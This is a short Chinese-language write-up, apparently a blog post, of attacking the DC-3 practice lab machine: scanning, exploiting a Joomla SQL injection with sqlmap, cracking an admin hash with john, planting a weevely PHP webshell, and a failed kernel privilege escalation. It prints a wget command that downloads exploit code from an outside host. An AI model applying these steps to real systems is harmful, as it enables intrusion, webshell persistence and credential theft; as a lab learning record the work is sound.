主机渗透系统:

kali linux

靶机:

DC-3

渗透过程:

先老规矩nmap扫描存活主机

1.png

再扫描靶机端口

2.png

访问一下页面,然后用dirb扫描一下目录得到登录界面administrator,是Joomla建站系统

于是用joolscan扫描一下网站,得到Joomla版本

3.png

在sploitsearch中搜索一下有不有现成的漏洞可以利用,发现有一个SQL注入漏洞

4.png

查看一下漏洞详细,直接用sqlmap跑,成功

5.png

最后在joomladb数据库#__users表里面查到账号密码,密码是hash加密后的结果

6.png

用john暴力破解得到明文密码snoopy

7.png

于是登录进后台,发现可以修改网页源代码

8.png

于是用weevely生成php后门文件

9.png

复制代码新建webshell.php文件,粘贴代码,保存

然后用weevely连,成功拿到shell

10.png

查看当前内核版本

11.png

在网上搜索了一下,这是Ubuntu 16.04版本

12.png

在searchsploit里面搜索一下这个版本有哪些漏洞

13.png

发现有个'double-fdput()' bpf(BPF_PROG_LOAD)提权漏洞,于是查看一下

根据链接下载攻击脚本到tmp目录下

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip /tmp

然后一系列解压运行

14.png

然后

15.png

提权失败,网上找了一下,说用-o nonempty可以解决mountpoint报错,然而还是不行,system() failed是什么操作

总结:这个靶机渗透主要还是利用已经存在的漏洞,学到了weevely生成后门和连接以及john爆破hash,感觉每打一次靶机都会新学知识,一直积累下去应该会很不错